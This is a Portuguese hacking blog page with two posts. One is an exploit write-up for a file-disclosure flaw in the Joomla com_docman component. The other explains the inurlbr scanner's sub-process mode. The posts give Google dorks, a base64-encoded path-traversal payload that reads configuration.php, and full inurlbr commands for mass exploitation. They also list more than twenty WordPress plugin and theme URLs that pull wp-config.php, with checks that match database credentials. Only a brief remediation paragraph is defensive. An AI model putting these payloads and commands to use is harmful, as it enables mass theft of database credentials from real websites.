Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador lfi. Mostrar todas as postagens
Mostrando postagens com marcador lfi. Mostrar todas as postagens

quarta-feira, 15 de julho de 2015

Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)

Exploring component of Joomla cms


# Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI) # CWE: CWE-200(FPD) CWE-98(LFI/LFD) # Risk: High # Author: Hugo Santiago dos Santos # Contact: hugo.s@linuxmail.org # Date: 13/07/2015 # Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman https://www.exploit-db.com/exploits/37620/


# Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)
# CWE: CWE-200(FPD) CWE-98(LFI/LFD)
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: [email protected]
# Date: 13/07/2015
# Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman
https://www.exploit-db.com/exploits/37620/

There is a get parameter untreated in the application "file=" which enables download files from the server.

Google Dork:
inurl:"/components/com_docman/dl2.php"

POC:
http://www.site.com/components/com_docman/dl2.php?archive=0&file=base64([LDF])

Internment such an application must use the native function of php base64_decode to access your files.

string base64_decode ( string $data [, bool $strict = false ] );
more http://php.net/manual/en/function.base64-decode.php

The application uses crypt 64 then we should do the same to get the server files.

injection string:
../../../../../../../target/www/configuration.php <= Not Ready

encoded string:

Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA== <= Ready !

Example
http://www.site.com/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==  <= Ready !

Using inurlbr scanner for mass exploitation:
 Download script: https://github.com/googleinurl/SCANNER-INURLBR
- Creating our command

SET DORK:
--dork 'inurl:"/components/com_docman/dl2.php"'

SET OUTPUT FILE:
 -s dl2.txt 

SET EXPLOIT GET
To encode our injection string we use a ineterna function of inurlbr script.
 base64 Encrypt values in base64.
     Example: base64({value})
     Usage:    base64(102030)
     Usage:
      --exploit-get 'user?id=base64(102030)'
  URL with inject get:
  http://www.target.us/user?id=MTAyMDMw
Use:
--exploit-get '/dl2.php?archive=0&file=base64(../../../../../../../target/www/configuration.php)'

OR USE SITE ENCODER: https://www.base64encode.org/
Use:
--exploit-get '/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA=='

SET FILTER 
Filter results in unique domains.
--unique

SET VALIDATION
Valid results based on your return http code.
      Example: --ifcode {ifcode}
      Usage:    --ifcode 200

COMPLETE COMMAND:
php inurlbr.php --dork 'inurl:"/components/com_docman/dl2.php"' -s dl2.txt  --exploit-get '/dl2.php?archive=0&file=base64(../../../../../../../target/www/configuration.php)'  --unique --ifcode 200

OR

php inurlbr.php --dork 'inurl:"/components/com_docman/dl2.php"' -s dl2.txt  --exploit-get '/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA=='  --unique --ifcode 200


Remediation:
The most effective solution to eliminate file inclusion vulnerabilities is to avoid passing user-submitted input to any filesystem/framework API. If this is not possible the application can maintain a white list of files, that may be included by the page, and then use an identifier (for example the index number) to access to the selected file. Any request containing an invalid identifier has to be rejected, in this way there is no attack surface for malicious users to manipulate the path.
https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
https://www.owasp.org/index.php/Full_Path_Disclosure

quinta-feira, 9 de abril de 2015

CONCEITO DE SUB_PROCESS / SCANNER INURLBR 2.0

 SUB_PROCESS - Consiste em concatenar uma serie de strings com base de um arquivo predefinido.

 Consiste em concatenar uma serie de strings com base de um arquivo predefinido.

============================================================


[!] LISTA DE STRING'S QUE SERÁ EXECUTADA(concatenada) PRA CADA ALVO ENCONTRADO.

  1. ['LIST_XPL_NAME']: = listxpl_wordpress_afd.txt

Conteúdo arquivo - URL XPL Wordpress Vulnerability Arbitrary File Download:


  • /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
  • /wp-content/force-download.php?file=../wp-config.php
  • /wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php
  • /wp-content/themes/SMWF/inc/download.php?file=../wp-config.php
  • /wp-content/themes/markant/download.php?file=../../wp-config.php
  • /wp-content/themes/yakimabait/download.php?file=./wp-config.php
  • /wp-content/themes/TheLoft/download.php?file=../../../wp-config.php
  • /wp-content/themes/felis/download.php?file=../wp-config.php
  • /wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php
  • /wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php
  • /wp-content/themes/epic/includes/download.php?file=wp-config.php
  • /wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
  • /wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
  • /wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
  • /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
  • /wp-content/themes/lote27/download.php?download=../../../wp-config.php
  • /wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php
  • /wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php
  • /wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php
  • /wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php
  • /wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php
  • /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php
  • /wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php

--------------------------------------------------------------------------------------

[!] CMS WORDPRESS VALIDATION / INURLBR 2.0
 Já possui tal validação por padrão padrão interno.

  • ['CMS-WORDPRESS-01'] = "define('DB_NAME'";
  • ['CMS-WORDPRESS-02'] = "define('DB_USER'";
  • ['CMS-WORDPRESS-03'] = "define('DB_PASSWORD'";
  • ['CMS-WORDPRESS-04'] = "define('DB_HOST'";

--------------------------------------------------------------------------------------

 [!] Running subprocesses:
 
 --sub-file  Subprocess performs an injection 
     strings in URLs found by the engine, via GET or POST.
     Example: --sub-file {youfile}
     Usage:   --sub-file exploits_get.txt
         
 --sub-get defines whether the strings coming from 
     --sub-file will be injected via GET.
     Usage:   --sub-get
         
 --sub-post defines whether the strings coming from 
     --sub-file will be injected via POST.
     Usage:   --sub-get

[!] Descrição de comando usado:

  1. DEFINIR DORK:                       --dork 'DORK'
  2. DEFINIR ARQUIVO FONTE:  -s 'output.txt'
  3. DEFINIR DORK:                       --sub-file 'file_subprocess.txt'
  4. FLAG TIPO REQUEST:            --sub-get / FLAG
  5. FLAG FILTRO HOST:              --unique  / HOST ÚNICOS EM SEU RESULTADO


[!] COMMAND EXEC:
GO! GO! ~
php inurlbr.php --dork 'site:br "Index of /wp-content/plugins/revslider"' -s teste.txt --sub-file 'listxpl_wordpress_afd.txt' --sub-get --unique
--------------------------------------------------------------------------------------

CADA BARRINHA  QUE É DEMONSTRADA, É UM PROCESSO DE VALIDAÇÃO..
Dá mesma forma que usei uns (strings/urls)xpls Wordpress, pode ser usado de outros CMS's...
ou URL's padrões para tentar gerar erros SQLI no server, Ataques LFI dá mesma forma..

[!] VÍDEO DEMONSTRATIVO:

Baixar scanner INURLBR 2.0: 
https://github.com/googleinurl/SCANNER-INURLBR




[ Neither war between hackers, nor peace for the system. ]